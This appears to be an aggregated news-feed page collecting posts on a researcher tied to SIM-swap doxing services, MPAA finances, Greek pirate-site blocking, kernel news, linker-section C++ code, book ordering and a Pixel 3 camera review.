In May 2018, ZDNet ran a story about the discovery of a glaring vulnerability in the Web site for wireless provider T-Mobile that let anyone look up customer home addresses and account PINs. The story noted that T-Mobile disabled the feature in early April after being alerted by a 22-year-old “security researcher” named Ryan Stevenson, and that the mobile giant had awarded Stevenson $1,000 for reporting the discovery under its bug bounty program.

The Twitter account @phobia, a.k.a. Ryan Stevenson. The term “plug” referenced next to his Twitch profile name is hacker slang for employees at mobile phone stores who can be tricked or bribed into helping with SIM swap attacks.

Likewise, AT&T has recognized Stevenson for reporting security holes in its services. AT&T’s bug bounty site lets contributors share a social media account or Web address where they can be contacted, and in Stevenson’s case he gave the now-defunct Twitter handle “@Phoobia.”

Stevenson’s Linkedin profile — named “Phobias” — says he specializes in finding exploits in numerous Web sites, including hotmail.com, yahoo.com, aol.com, paypal.com and ebay.com. Under the “contact info” tab of Stevenson’s profile it lists the youtube.com account of “Ryan” and the Facebook account “Phobia” (also now deleted).

Coincidentally, I came across multiple variations on this Phobia nickname as I was researching a story published this week on the epidemic of fraudulent SIM swaps, a complex form of mobile phone fraud that is being used to steal millions of dollars in cryptocurrencies.

Unauthorized SIM swaps also are often used to hijack so-called “OG” user accounts — usually short usernames on top social network and gaming Web sites that are highly prized by many hackers because they can make the account holder appear to have been a savvy, early adopter of the service before it became popular and before all of the short usernames were taken. Some OG usernames can be sold for thousands of dollars in underground markets.

This week’s SIM swapping story quoted one recent victim who lost $100,000 after his mobile phone number was briefly stolen in a fraudulent SIM swap. The victim said he was told by investigators in Santa Clara, Calif. that the perpetrators of his attack were able to access his T-Mobile account information using a specialized piece of software that gave them backdoor access to T-Mobile’s customer database.

Both the Santa Clara investigators and T-Mobile declined to confirm or deny the existence of this software. But their non-denials prompted me to start looking for it on my own. So naturally I began searching at ogusers-dot-com, a forum dedicated to the hacking, trading and sale of OG accounts. Unsurprisingly, ogusers-dot-com also has traditionally been the main stomping grounds for many individuals involved in SIM swapping attacks.

It didn’t take long to discover an account on ogusers named “Ryan,” who for much of 2018 has advertised a number of different “doxing” services — specifically those aimed at finding the personal information of customers at major broadband and telecom companies.

In some of Ryan’s sales threads, fellow forum members refer to him as “Phob” or “Phobs.” In a post on May 27, Ryan says he’s willing to pay or trade for OG accounts under the name “Ryan,” “Ryans”, “RS,” “RMS” or “Stevenson” on any decent sized popular Web site. “hmu [hit me up] in a pm [private message] to talk,” Ryan urged fellow forum members.

The OG User forum account “Ryan” asking fellow members to sell or trade him any major Web site account name that includes the OG username “Ryan” or “Stevenson.”

I found that as late as June 2018 Ryan was offering a service that he claimed was capable of “doxing any usa carrier,” including Verizon, AT&T, Sprint, T-Mobile, MetroPCS and Boost Mobile.

“All I need is the number,” Ryan said of his customer data lookup service, which he sold for $25 per record. “Payment BTC [bitcoin] only.”

For $25 per record, Ryan offered fellow ogusers members the ability to look up customer records tied to any customer of the major U.S. mobile providers.

Very similar offerings were made by Phobia’s alter ego “AOLer” on the sprawling English language online hacking community Hackforums.

I first encountered Stevenson several years back while trying to work out who was responsible for calling in a phony hostage situation and sending a heavily armed police force to our Northern Virginia home in 2013. In a follow-up to that story, Stevenson admitted that he was responsible for the high-profile hack against Wired reporter Mat Honan, who documented how a hacker named Phobia had deleted his Google account and remotely erased all data from his iPhone, iPad and MacBook.

Going by the nickname “Phobiathegod” at the time, Stevenson was then part of a group of young men who routinely hijacked OG account names on Microsoft’s Xbox gaming platform, often using methods that involved tricking customer service people at the target’s mobile provider into transferring the victim’s calls to a number they controlled.

Fast forward to today, and Phobia’s main Twitter account (pictured at the top of this post) includes the phrase “the plug” next to his profile. In SIM swapping circles, a “plug” is hacker slang for an employee at a mobile phone store who can be bribed, tricked or blackmailed into assisting with an unauthorized SIM swap.

Reached via instant message on LinkedIn, Stevenson acknowledged running the ISP doxing services, but said his account on the OGusers forum was since banned and that hardly anyone took him up on his offer anyway.

“I shouldn’t have made the threads even though no one really asked for anything,” he said. “I’m on the good side. But its almost 2019 and I need to find a new hobby I can’t be bothered to look for breaches/vulns, haven’t got 1 job offer or recommendation yet.”

Asked about “the plug” reference in his Twitter profile, Stevenson suddenly stopped replying. Not long after that, the @Phobia Twitter account was deactivated.

Stevenson denied being involved in SIM swapping attacks, but it is clear Phobia was fairly tight with many people who are or until recently were at the center of this scene. In July 2018, authorities in California arrested 20-year-old Boston resident Joel Ortiz for allegedly conducting dozens of fraudulent SIM swaps and stealing at least $5 million worth of cryptocurrency from victims.

Like Phobia, Ortiz had a presence on OGusers and had acquired some of the most OG social media accounts available, including the Twitter and Instagram account names with the number zero (@0), and the OG Youtube accounts “Joel” and “X”.

On Oct 27, 2017, the Youtube account “Joel” published a 4-minute video of Stevenson dancing to a popular rap song in front of the camera. On July 5, 2018, just days before Ortiz was arrested, the Twitter account “0” gave a shout out to @Phobia on Twitter suggesting Phobia was actually tweeting using Ortiz’s “0” account.

21:00

MPAA Considers a ‘Makeover’ As It Faces Shrinking Budget [TorrentFreak]

The Motion Picture Association of America (MPAA) has protected Hollywood’s interest for nearly a century now.

In recent years the organization’s anti-piracy efforts have made the headlines repeatedly. Not just domestically, but around the world, through its site-blocking efforts for example.

Traditionally, the MPAA obtains most of its revenue from the six major Hollywood studios. The latest public filings show that these membership dues totaled nearly $50 million.

This number is significantly less than before, as we reported earlier, but new information suggests that it may drop even further.

As a result of Disney’s acquisition of 20th Century Fox, the MPAA stands to lose one-sixth of its membership dues. Disney promised to pay Fox’s share for another year after the deal is finalized, but what happens next is uncertain.

According to a report from The Information, the MPAA is now discussing a makeover of the organization.

While no crystalized plans have been released, several insiders said that the group is considering accepting new members, including streaming services such as Netflix and Amazon. This would add more revenue, but also broaden the organization’s mandate.

It is unknown how concrete these plans are or whether the MPAA approached potential new members already. Whatever the eventual direction may be, it won’t be an easy task.

“This can’t just be an economic exercise,” one of the people familiar with the discussions told The Information. “It has to be a come-to-Jesus moment.”

Although Amazon and Netflix have a shared interest with Hollywood on some fronts, both have their differences as well. The MPAA has been at odds with major tech companies over the years, companies that are closely aligned with the streaming giants.

That said, Amazon, Netflix, and the MPAA already work together in another anti-piracy initiative. They are all part of the Alliance for Creativity and Entertainment (ACE), which counts 30 companies in total.

The ACE coalition is, in fact, running on the MPAA’s anti-piracy resources, including personnel. That brings up the next makeover option.

If the MPAA can’t continue in its current form and is unable to add more members, whether those are traditional movie studios or streaming providers, some people suggested that it could fold into ACE.

That’s an even more complex path, perhaps, since the MPAA does more than fighting piracy. But in theory, the MPAA could continue as is in a slimmed down version, while its anti-piracy efforts move to ACE.

For now, it’s all just speculation. But it’s clear that the MPAA has more on its mind than fighting pirates.


20:49

The Pentagon is Publishing Foreign Nation-State Malware [Schneier on Security]

This is a new thing:

The Pentagon has suddenly started uploading malware samples from APTs and other nation-state sources to the website VirusTotal, which is essentially a malware zoo that's used by security pros and antivirus/malware detection engines to gain a better understanding of the threat landscape.

This feels like an example of the US's new strategy of actively harassing foreign government actors. By making their malware public, the US is forcing them to continually find and use new vulnerabilities.

19:28

Information doesn't want to be free isn't. [wish]

Some e-book stores will send e-books to your kindle via e-mail but don't provide the facility to send them to non-kindle e-mail addresses. I was investigating whether it would be easier to set this up and then automate download from Amazon to my computer for importation into Calibre when I discovered I can no longer download my copy of Information Doesn't want to be free. On selecting "Download and transfer via USB" I am told, "No device is eligible for Downloading the selected content". A drop-down menu is provided that lists devices associated with my Amazon account but they are all grayed out.

It looks like Amazon will no longer allow me to download even DRM free content unless I can prove to them that I have an ancient kindle that can't connect directly.

18:42

News Post: Adventure Mode! [Penny Arcade]

Gabe: I’ve dipped my toe into Diablo III many times over the years. I am not much of a PC gamer but when it hit consoles I put a decent amount of time into it. I just picked it up again on the Switch and tried playing a seasonal character in adventure mode which is something I’d never tried before. In past versions of the game you had to beat the entire story to unlock adventure Mode, but the Switch version allows you to jump right into it. I’ve probably started the Diablo III campaign a hundred times, but never gotten all the way to the end. I like the game on the Switch but honestly…

17:56

The kernel pull-request tracker bot [LWN.net]

Since the beginning, one part of the kernel-development task has been watching the mainline to see whether one's work had been merged. That is about to change with the advent of the pull-request tracker bot, which will inform maintainers when one of their pull requests has made it into the mainline. Konstantin Ryabitsev, who put this service together, plans to expand it to other trees once things have settled down.

Link [Scripting News]

Theory why Trump fired Sessions and appointed Whitaker now. They know Mueller is about to issue his report. They wanted to move first, do something, anything, to be able to say they were on top of it. It won’t work, he’s the Keystone Kops president.

How to Get Signed and Personalized Books From Me For the Holidays, 2018 [Whatever]

It’s that time of the year again, and once again I am teaming up with Jay & Mary’s Book Center, my local independent bookseller, to offer signed and personalized books for gift-giving. It’s a great way to get a unique gift for someone you love (even yourself!) while at the same time supporting a fabulous local business that does a fantastic job in its community.

So: How do you get signed and personalized books from me this year? It’s simple:

1. Call Jay & Mary’s at their 800 number (800 842 1604) and let them know you’d like to order signed copies of my books. Please call rather than send e-mail; they find it easier to keep track of things that way.

2. Tell them which books you would like (For example, The Consuming Fire), and what, if any, names you would like the book signed to. If there’s something specific you’d like written in the books let them know but for their sake and mine, please keep it short. Also, if you’re ordering the book as a gift, make sure you’re clear about whose name the book is being signed to. If this is unclear, I will avoid using a specific name.

3. Order any other books you might think you’d like, written by other people, because hey, you’ve already called a bookstore for books, and helping local independent bookstores is a good thing. I won’t sign these, unless for some perverse reason you want me to, in which case, sure, why not.

4. Give them your mailing address and billing information, etc.

5. And that’s it! Shortly thereafter I will go to the store and sign your books for you.

If you want the books shipped for Christmas, the deadline for that is December 10. (That’s a Monday this year.) That way we can make sure everything ships to you on time. After December 10, all Scalzi stock will still be signed and available, but I will likely not be able to personalize, and we can’t 100% guarantee Christmastime delivery.

Ordering early is encouraged — it makes sure we will absolutely be able to order your book and have it to you on time.

Also, this is open to US residents only. Sorry, rest of the world. It’s a cost of shipping thing.

What books are available?

CURRENT HARDCOVER: This year we have two new hardcovers for 2018: Head On, which takes place in the same world as Lock In, but can be read as a standalone if you like, and also The Consuming Fire, which is a direct sequel to The Collapsing Empire. The Collapsing Empire is also still probably available in hardcover if you ask. Also, the small-format hardcover of Old Man’s War (which looks great and is the perfect size for stocking stuffers) is available as well.

(Virtue Signaling, my collection of essays, will be available for the holidays, but only via pre-order at the Subterranean Press site, so if you’re looking for that, you’ll need to go order from there. These copies will be signed but I won’t be able to personalize them.)

CURRENT TRADE PAPERBACK: Redshirts (the 2013 Hugo Award winner!), Twenty-First Century Science Fiction (which features a story of mine), Metatropolis (which I edited and contribute a novella to). There may be hardcovers of these still around if you ask. But each are definitely in trade paperback. There are also probably still trade paperback editions of Old Man’s War that can be ordered if you prefer that format.

CURRENT MASS MARKET PAPERBACK: The Collapsing Empire, Unlocked: An Oral History of the Haden Syndrome (this is a novella), The End of All Things, Lock In, The Human Division, Fuzzy Nation, Old Man’s War, The Ghost Brigades, The Last Colony, Zoe’s Tale, The Android’s Dream, Agent to the Stars, The New Space Opera 2. You can also purchase the Old Man’s War boxed set (which features the first three books in the series), BUT if you want that signed you’ll have to agree to let me take the shrinkwrap off. In return I’ll sign each of the books in the box.

CURRENT NON-FICTION: Your Hate Mail Will Be Graded (essay collection, Hugo winner), The Mallet of Loving Correction (also an essay collection, this will need to be special ordered as it is a signed limited), and Don’t Live For Your Obituary (a collection of essays about writing, will also need to be special ordered).

AUDIOBOOKS: The Consuming Fire, The Dispatcher, The End of All Things, Lock In, The Human Division, Redshirts, Fuzzy Nation, The God Engines, Metatropolis and Agent to the Stars are all available on CD and/or MP3 CD, and Jay & Mary’s should be able to special order them for you. Check with them about other titles, which may or may not be available on CD.

Two things regarding audiobooks: First, if you want these, you should probably call to order these ASAP. Second, and this is important, because the audiobooks come shrinkwrapped, I will have to remove the shrinkwrap in order to sign the cover. You ordering a signed audiobook means you’re okay with me doing that and with Jay & Mary’s shipping it to you out of its shrinkwrap.

If you have any other questions, drop them in the comment thread and I’ll try to answer them!

17:35

Today in GPF History for Friday, November 9, 2018 [General Protection Fault: The Comic Strip]

When Ki spills the beans about Nick's embarrassing sex dream, Sharon's curiosity is piqued...

16:28

[$] ktask: optimizing CPU-intensive kernel work [LWN.net]

As a general rule, the kernel is supposed to use the least amount of CPU time possible; any time taken by the kernel is not available for the applications the user actually wants to run. As a result, not a lot of thought has gone into optimizing the execution of kernel-side work requiring large amounts of CPU. But the kernel does occasionally have to take on CPU-intensive tasks, such as the initialization of the large amounts of memory found on current systems. The ktask subsystem posted by Daniel Jordan is an attempt to improve how the kernel handles such jobs.

Link [Scripting News]

A rambling 22-minute podcast on the election. Why it's important to savor victory. There was a lot of good news in Tuesday's results. Feel the winning. The political system might be killing us, but America, underneath it all, is still America. Most important, by giving the House to a party that will do real oversight, we re-asserted the control by the people over the government. Whether you support Trump or not, this has to be seen as good.

Link [Scripting News]

Obama should go on a victory tour now, hold rallies to drive home what we accomplished by showing up to vote. Host SNL. Visit with Jimmy Kimmel. Do an interview with the NYT. He's the one Democrat who can't be accused of campaigning for 2020. Solidify the message, we asked people to vote, and they did, and look what we accomplished. When I ran a company, I always made my sales people visit the distributors after we shipped a hit product. It wasn't for sales, it was to soak up the feeling of winning.

Link [Scripting News]

Are there any USB-C drives? I was sure there would be by now, but are there?? Can't find them on Amazon. What is USB-C good for?? (Update: LaCie has a 2TB portable USB-C drive. $90.)

15:42

Security updates for Friday [LWN.net]

Security updates have been issued by Debian (nginx), Fedora (icu, java-1.8.0-openjdk-aarch32, libgit2, php-pear-CAS, roundcubemail, and ruby), Gentoo (firefox, libX11, openssl, and python), openSUSE (thunderbird), Oracle (java-11-openjdk, kernel, and spice-server), Red Hat (java-1.8.0-ibm and thunderbird), Scientific Linux (spice-server), SUSE (curl, libepubgen, liblangtag, libmwaw, libnumbertext, libreoffice, libstaroffice, libwps, myspell-dictionaries, xmlsec1, libxkbcommon, openssh, and xorg-x11-server), and Ubuntu (pyopenssl).

Heartbreak and trust [Scripting News]

Have you ever been in a failed friendship, relationship, business partnership? I'm beginning to think most people haven't, based on their willingness to forget that Trump is a lying con artist who is being blackmailed by Putin and probably a dozen other countries by now.

A friend posted: "This will be an easily disproven lie" about something Trump said. Please. It's like a wife who's sleeping around. Everyone knows but you (the spouse). Trump always lies. It's more interesting to try to prove he's not lying.

Moral of the story, with Trump, always --

  1. He's a troll.
  2. Don't take the bait.

A Hole Lotta Gamehole! [Dork Tower]

The Otyugh Plushies are here!

This weekend is Gamehole Con, and Dorkstock 2018. I didn’t have anything scheduled for the convention Thursday, although I planned to pop in and say hello to everybody. Right now though, I need to get on the phone with Apple. Big-time computer crash.

Also, the Doubleclicks are staying with us, and they arrive in a few hours.

If you’re at Gamehole Con, I should be hanging around the Dorkstock area (Mendota rooms 1 and 2) much of the remainder of the weekend.

My official schedule is:

FRIDAY, NOVEMBER 9

Tabaxi Swashbuckler, essentially.

SATURDAY, NOVEMBER 10

  • 12 – 1 PM: Seminar – Board Game Design (Waubesa Room)
  • 2 – 4 PM: Dork Tower 20th Birthday Celebration – Cake and Igor Bar Contest
  • 4 – 5 PM: Seminar – 20 Years of Dork Tower (Waubesa Room)

So anyway, yes – this is a crazy period. Fortunately, I’m not actually stress-eating.

But we’ll see how the next few days go – there are Igor bars on the horizon, after all!

– John

PS: SIX DAYS TO GO! SIX DAYS TO GO! DID I MENTION THERE’S SIX DAYS TO GO THAT’S LESS THAN ONE WEEK LEFT FOR…

15:35

Gotchas when using linker sections to arrange data, part 2 [The Old New Thing]

We saw last time that you need to accommodate potential padding between fragments within a section when walking through an array of pointers. Fortunately, it's a simple matter of skipping over null pointer entries.

Dealing with padding between fragments when you have a sequence of structures is more complicated, because the amount of padding may not be an exact multiple of the structure size.

struct THING
{
    const char* name;
    int value;
};

#pragma section("mydata$a", read)  
__declspec(allocate("mydata$a")) \
    const THING firstThing{};

#pragma section("mydata$m", read)  
#define ADD_THING(x, y) \
__declspec(allocate("mydata$m")) \
    const THING thing##x{#x, y}

#pragma section("mydata$z", read)  
__declspec(allocate("mydata$z")) \
    const THING lastThing{};

// file1.cpp
ADD_THING(Red, 3);

// file2.cpp
ADD_THING(Blue, 4);

// file3.cpp
ADD_THING(Green, 0);

We would be tempted to write

// This code is wrong: it assumes entries are always sizeof(THING) apart.
void LessNaiveRegisterAllTheThings()
{
    auto begin = (uintptr_t)&firstThing + sizeof(firstThing);
    auto end = (uintptr_t)&lastThing;
    for (auto current = begin; current < end;
         current += sizeof(THING)) {
      auto thing = (const THING*)current;
      if (thing->name) RegisterThing(thing->name, thing->value);
    }
}

However this will run into trouble if padding is inserted that is not a multiple of sizeof(THING). In that case, advancing by sizeof(THING) would eventually cause us to step over some padding bytes as well as the initial bytes of a valid THING.

We will have to walk the pointer past any null bytes until we find the start of a "good" structure.

This also means that zero cannot be a legitimate value for the first member of a "good" structure, because we wouldn't be able to figure out whether a zero value is the start of a "good" structure, or whether it's just padding.

In the above example, we know that the name is never null, so we can use that as our signal as to whether we have the start of a valid THING. If not, then we advance by the alignment of a THING and try again.

void RegisterAllTheThings()
{
    auto begin = (uintptr_t)&firstThing + sizeof(THING);
    auto end = (uintptr_t)&lastThing;
    auto current = begin;
    while (current < end) {
        auto thing = (const THING*)current;
        if (thing->name) {
            RegisterThing(thing->name, thing->value);
            current += sizeof(THING);
        } else {
            current += alignof(THING);
        }
    }
}
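
The following added example (not from the original article) models the merged section as an ordinary byte buffer so that both walks can be compared on any compiler. The buffer layout, the alignof(THING)-sized padding runs, and the names SimulatedSection, BuildSection, NameBits, WalkFixedStride and WalkSkippingPadding are assumptions made for illustration. It shows the fixed-stride walk missing Blue and mistaking Blue's value field for a name, while the padding-skipping walk finds all three entries.

```cpp
// Added illustration, not code from the original article. The section is
// modelled as a byte buffer; a real one is laid out by the linker.
#include <cstddef>
#include <cstdint>
#include <cstdio>
#include <cstring>
#include <vector>

struct THING
{
    const char* name;
    int value;
};

// Constructed sample layout (hypothetical):
//   firstThing | Red | padding | Blue | padding | Green | lastThing
// Each padding run is alignof(THING) zero bytes, which is a legal amount of
// padding but not a multiple of sizeof(THING).
struct SimulatedSection
{
    std::vector<unsigned char> bytes;
    std::vector<std::size_t> trueOffsets; // where the real THINGs start
    std::size_t begin = 0;                // first byte after firstThing
    std::size_t end = 0;                  // offset of lastThing
};

static void AppendThing(SimulatedSection& s, const char* name, int value)
{
    unsigned char raw[sizeof(THING)] = {}; // struct padding stays zero
    std::memcpy(raw + offsetof(THING, name), &name, sizeof(name));
    std::memcpy(raw + offsetof(THING, value), &value, sizeof(value));
    s.bytes.insert(s.bytes.end(), raw, raw + sizeof(raw));
}

SimulatedSection BuildSection()
{
    static const char* const names[] = { "Red", "Blue", "Green" };
    static const int values[] = { 3, 4, 0 };
    SimulatedSection s;
    AppendThing(s, nullptr, 0);            // firstThing sentinel
    s.begin = s.bytes.size();
    for (int i = 0; i < 3; ++i) {
        if (i > 0)                         // inter-fragment padding
            s.bytes.insert(s.bytes.end(), alignof(THING),
                           static_cast<unsigned char>(0));
        s.trueOffsets.push_back(s.bytes.size());
        AppendThing(s, names[i], values[i]);
    }
    s.end = s.bytes.size();
    AppendThing(s, nullptr, 0);            // lastThing sentinel
    return s;
}

// Reads the bytes where a THING's name member would sit, as an integer, so a
// misaligned read never yields a pointer that could be dereferenced.
static std::uintptr_t NameBits(const SimulatedSection& s, std::size_t offset)
{
    std::uintptr_t bits = 0;
    std::memcpy(&bits, s.bytes.data() + offset + offsetof(THING, name),
                sizeof(bits));
    return bits;
}

// The tempting walk: always advance by sizeof(THING).
std::vector<std::size_t> WalkFixedStride(const SimulatedSection& s)
{
    std::vector<std::size_t> found;
    for (std::size_t cur = s.begin; cur < s.end; cur += sizeof(THING))
        if (NameBits(s, cur) != 0) found.push_back(cur);
    return found;
}

// The corrected walk: on a null name, advance by alignof(THING) and retry.
std::vector<std::size_t> WalkSkippingPadding(const SimulatedSection& s)
{
    std::vector<std::size_t> found;
    std::size_t cur = s.begin;
    while (cur < s.end) {
        if (NameBits(s, cur) != 0) {
            found.push_back(cur);
            cur += sizeof(THING);
        } else {
            cur += alignof(THING);
        }
    }
    return found;
}

int main()
{
    SimulatedSection s = BuildSection();
    for (std::size_t off : s.trueOffsets) std::printf("true start   %zu\n", off);
    for (std::size_t off : WalkFixedStride(s)) std::printf("fixed stride %zu\n", off);
    for (std::size_t off : WalkSkippingPadding(s)) std::printf("skip padding %zu\n", off);
    return 0;
}
```
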

A less complicated alternative is to avoid generating structures into ordered segments and just use pointers exclusively.

#pragma section("mydata$a", read)  
__declspec(allocate("mydata$a")) \
    const THING* const firstThing = nullptr;

#pragma section("mydata$m", read)  
#define ADD_THING(x, y) \
    const THING thing##x{#x, y}; \
__declspec(allocate("mydata$m")) \
    const THING* const thing##x##ptr = &thing##x;

#pragma section("mydata$z", read)  
__declspec(allocate("mydata$z")) \
    const THING* const lastThing = nullptr;

// file1.cpp
ADD_THING(Red, 3);

// file2.cpp
ADD_THING(Blue, 4);

// file3.cpp
ADD_THING(Green, 0);

At this point, we can use the "pointers" pattern.

void RegisterAllTheThings()
{
    auto begin = (uintptr_t)&firstThing
                 + sizeof(firstThing);
    auto end = (uintptr_t)&lastThing;
    for (auto current = begin; current < end;
         current += sizeof(const THING*)) {
      auto thing = *(const THING* const*)current;
      if (thing) RegisterThing(thing->name, thing->value);
    }
}

For extra style points, you could move the firstThing to mydata$b and generate the THING objects into mydata$a. This keeps all the THING objects contiguous in memory, which is more cache-friendly. It also keeps them close to the pointer table, which means that they will all page in/out together. Since this data is probably going to be used only at process startup, putting them all together lets them page out once and stay out.

14:49

Greek ISPs Ordered to Block 38 Domains, Including The Pirate Bay [TorrentFreak]

Copyright holders are increasingly demanding that ISPs should block access to pirate sites in order to protect their business.

As the bastion of online piracy, The Pirate Bay has become one of the main targets. The site has been blocked in roughly two-dozen countries already, mostly in Europe.

Earlier this week we reported that Romania had joined in on the action, following a court order, and only a few days later Greek Internet providers are now ordered to block the notorious torrent site as well.

The blocking request was filed this spring by the Society for the Protection of Audiovisual Works (EPOE), a local anti-piracy group which represents the interests of major Greek copyright holders.

The group filed an application with the IPPC, a special commission that falls under the Greek Ministry of Culture and Sports, which decided that ISPs must block a total of 38 domain names.

The targeted sites include The Pirate Bay, 1337x, YTS, as well as several popular local sites, such as Xrysoi, Gamatotv, and Tainiomania. With Subztv.club, Subtitles.gr, and others, subtitle sites are thrown into the mix as well.

According to the Government-affiliated commission, it is apparent that all the targeted sites are involved in large-scale copyright infringement.

The commission has set a tight deadline of 48 hours for ISPs to comply with the order. Those who fail to do so face a fine of 850 euros per day, Lawspot reports.

The order stands for three years and it specifically states that offenses committed by users are not covered.

It’s worth noting that this wasn’t the first attempt to block The Pirate Bay and other pirate sites in Greece. AEPI previously launched a civil court case, but at the time the court ruled that pirate site blocks were disproportionate and unconstitutional.

It’s questionable whether this would hold up today, though, as the EU Court of Justice ruled otherwise last year.

Whether the current blockades will help to deter piracy in a meaningful way has yet to be seen. As usual, there are several options to bypass ISP blockades, and the targeted sites themselves often offer alternative domains.

The full list of domain names is posted below and a copy of the order can be found here.

Source: TF, for the latest info on copyright, file-sharing, torrent sites and more. We also have VPN reviews, discounts, offers and coupons.

14:28

Taking Pictures With the Pixel 3: Some Thoughts [Whatever]

When I was heading to France last week, I considered taking my Nikon d750 with me, because I thought, not unreasonably, that France might be a photogenic country and that I might want to get some high quality photos of the place. I decided against it for a number of reasons, but one of the major reasons was that a couple of weeks ago I got myself a Pixel 3 phone, which reviewers have suggested may have the best camera on a phone out there. I’d previously had a Pixel 2, the former “best cell phone camera out there,” so I was curious as to how the Pixel 3 would improve on the camera.

So I left the Nikon at home and used only the Pixel 3 to take shots while I was in France. I ended up taking something around 500 pictures while I was in country (many of the best of which I have collected in this Flickr photo album), and can now tell you what I think about the experience. Here are my notes, in no particular order, with occasional art. Please remember that these thoughts are from someone who loves taking pictures but is not a professional photographer, so I’m not going to go into the weeds with technical issues and jargon. I’m mostly noting the experience of just trying to take pictures.

1. Overall I was very happy with the quality of the photos and the intelligence of the camera — the latter perhaps being a weird thing to say, but the fact is what separates the Pixel line of cell phones as cameras is not the hardware (which is mostly high-end but standard issue for a cell phone), but the processing Google applies to the photo data once the photo is taken. The camera makes choices, basically, about how it interprets the data you give it once you snap the photos.

And those choices are generally very good! There wasn’t a situation where I thought the Pixel 3 wasn’t capable of handling itself. As with nearly all cell phone cameras (and, honestly, nearly every camera, period), the Pixel 3 works best when it has a lot of good, bright, natural light, but it did very well inside and also very well in visually challenging environments with a lot of contrast between bright and dark (like, for example, the interior of the Notre Dame cathedral). Not every picture I took was perfect or even good, but the reason for that had as much to do (and perhaps even more so) with operator error as it did with the camera itself. Which is to say I can’t blame the bad pictures on the cell phone camera; a lot of it was me.

2. What do the photos look like coming out of the camera? Here are five, which I’ve not done any post-processing to (i.e., no tweaking with the various photo editors I have). These pictures were taken with the settings the Pixel 3 has right out of the box, including the HDR+ processing turned on, without zoom, and recording to jpg. Right-click on the pictures to get larger versions of them (choose the “open image in new tab” option), and see the various details.

Right out of the camera, the Pixel 3 does a pretty good job of things. The colors are correct and not overly saturated, and the HDR+ mode does a good job of bringing out details in shadows without making them look overly processed. Note in particular the picture of the musicians in the conference room; the light’s behind them and their faces are shadowed, but the Pixel 3 does a pretty good job of balancing the data so you can see their faces clearly. In the rose picture there’s decent depth of field — not a lot, but the Pixel 3 knows what it’s looking at. There are limits, and you can see some of the choices the Pixel 3 has to make in the photo of the Notre Dame alcove, but those limits mostly show themselves in challenging situations where most any camera would show limitations of some sort.

I personally do a fair amount of photo-editing of my pictures, both to bring up details and for aesthetic effect, and the Pixel 3 gives me a fair amount to work with, even as it records the data into a lossy format like jpg (there is an option to have the camera record in RAW — the lossless format that gives photographers the most information to work with — but I didn’t turn that on and don’t really plan to except on very special occasions, because the file sizes are huge). It’s a fact that for a lot of photos, I don’t really have to do much editing at all — I merely straighten out sightlines or crop for better composition as much as I tweak colors or bring up shadows.

Out of the box, the Pixel 3 takes pictures that are better than “good enough,” and that’s a good thing. For people who like fiddling with photos like me, what comes out of the camera is even better than that.

3. One of the — perfectly reasonable — knocks on the Pixel 3 is that where other high-end cell phone cameras have an optical zoom function, the Pixel 3 doesn’t, Google instead opting to try to deal with zoom through processing (involving the minute unsteadiness of the human hand, or something, to help fill in interpolative gaps). I used the zoom function a lot while walking around and trying to get details that would otherwise be too far away. My verdict on the zoom is: well, it does something, but razor-sharp details isn’t it.

This is again probably best viewed, so here are four photos at or close to full zoom, three of statues or architectural details at the Louvre, and one, of that tower they have there in Paris. Again, right-click on the picture for details (or in this case, lack thereof). Again, these pictures are straight out of the camera and otherwise unedited:

My impression of these zoomed in pictures is that they don’t look like photos, they look like pastel drawings, or what happens when you use a very light “oil painting” photo filter from Photoshop or some other photo app. They don’t look bad? But at the same time, this is not what I want when I zoom in. I zoom in because I want a closer look at something, not an artful, detail-smoothed representation of that thing.

I read in a review of the Pixel 3 where a reviewer notes that the zoom works as intended up to about a 1.5x zoom, and after that things start getting overly interpretive. My experience has been that this estimation is largely correct. I have some pictures that are moderately zoomed in that are perfectly good. But too much zoom means you’re getting the AI version of impressionism. My thought on this is that this iteration of AI zoom is only the first, and that Google will probably get better at it as it goes along, because that’s what Google generally does. So two Pixel generations from now, this will likely be a solved issue (or alternately, Google will throw up its hands and just put an optical zoom on future Pixels). Here with the Pixel 3 and today, however, be aware that the zoom works up to a point (1.5x or so), and then it gets kind of wacky.

4. The only other real issue with the Pixel 3 that I’ve noticed is that it feels a bit slower than the Pixel 2; sometimes there seems to be a lag between when I press the button to take the picture and the camera registers the picture being taken. It’s a relatively small issue but it’s been noticeable to me, and I wonder if other people have been experiencing it as well. I’ve not missed any photos because of it, fortunately. But be aware of the possibility of a bit of shutter lag.

5. On the selfie front, the Pixel 3 features a “wide angle selfie” mode — an optical zoom out, if you will, thanks to two cameras on the front of the phone. This actually is very useful for when you’re trying to get a lot of people into frame while taking selfies:

Do be aware that the wide-angle selfie mode has some distortion. But then, selfie cameras have distortion anyway (it’s why your nose always looks big in a selfie), so I guess you pick your poison with selfie distortion. What I do know is that I’ve used the wide-angle selfie function several times already, so this was a smart add-on on Google’s part.

6. This is not meant to be an exhaustive review of the Pixel 3 camera, but one that touches on how I’ve been using it. I’m not covering a lot of the functionality of the thing — I haven’t used the video mode, or the panorama mode or tried the “HDR+ enhanced” mode, or sideloaded the apparently super-cool but not-officially-released “night mode” into the phone to try it out (the night mode apparently makes it possible to take super clear pictures in very low light, and the key as far as I can tell is a long exposure time, which, well, yes, it would be, wouldn’t it). I’m not covering any of those things because, as noted, this is not how I’ve been using the camera. I’ve been using the camera in a pretty straightforward fashion, as I suspect most people will.

And as a “daily driver” camera, the Pixel 3 really works. It takes great pictures and in all sorts of circumstances, and with the exception of the zoom above a certain point, steps up when you need it to (also, as an aside, the fact that the Pixel 3 comes with unlimited storage in Google Photos is a point well in its favor, since you can store your photos there and keep your phone’s memory relatively uncluttered). We’re now well past the point where the average person has to wonder whether they’re missing out on really excellent photos if they only have their cell phone with them. With the Pixel 3, the answer to that is definitively “you’re not missing out.” This phone will get that great shot for you, most of the time.

7. Does this mean I’m ready to ditch my dSLR for the Pixel 3 full time? No; the dSLR still has a better sensor, better lenses, and does specific things much better than the Pixel 3 does or will (like, sorry, Google, zoom). But this isn’t an either/or situation; this is a “this, and” situation. I no longer have one excellent camera and one camera that I just happen to carry around; I have two excellent cameras whose use cases overlap but are not a perfect circle on the Venn diagram. I don’t suspect I’ll ever stop using a dedicated camera for particular things where a high-end, single-use piece of machinery makes sense. But, as noted above, when I have my Pixel 3 with me, I don’t worry that I don’t generally have enough camera with me.

